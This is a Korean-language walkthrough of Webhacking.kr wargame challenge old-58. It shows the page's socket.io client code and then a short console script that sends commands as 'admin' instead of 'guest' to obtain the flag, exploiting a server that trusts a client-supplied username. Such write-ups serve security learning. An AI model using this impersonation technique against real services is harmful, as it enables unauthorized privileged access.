[Webhacking.kr] 웹 해킹 old-58번 문제 풀이

58번 문제 페이지에 들어가면 무언가를 입력할 수 있는 창이 보인다.

임의의 문자를 넣어 Send했는데 command를 찾을 수 없다고 출력되었다.

명령어를 입력해야 할 것 같아 일단 help 명령어로 내가 쓸 수 있는 커맨드를 확인해 보았다.

ls, id, flag를 각각 입력해보았더니 아래와 같은 결과가 나왔다.

소스코드를 확인해보았다.

    $(function () {
      var username = "guest";
      var socket = io();
      $('form').submit(function(e){
        e.preventDefault();
        socket.emit('cmd',username+":"+$('#m').val());
        $('#m').val('');
        return false;
      });
      socket.on('cmd', function(msg){
        $('#messages').append($('<li>').text(msg));
      });
    });

send 버튼을 누르면 javascript에서 웹 소켓을 통해 서버로 메시지를 전달하고, 응답을 출력하는 코드이다.

위와 동일하게 자바 스크립트로 서버와 소켓을 하나 더 생성하여, admin 계정으로 데이터를 보내줄 것이다.

 

guest를 admin으로 바꾸고, 소켓 연결 함수 io()와 소켓을 통해 데이터를 보내는 emit() 함수, 데이터를 받는 on() 함수 세 가지만 추출해서 코드를 작성한다.

이것을 console창에 입력해주면 FLAG값이 출력된다.

var username = "admin";
var socket = io();
socket.emit('cmd',username+":flag");
socket.on('cmd', function(msg){console.log(msg);});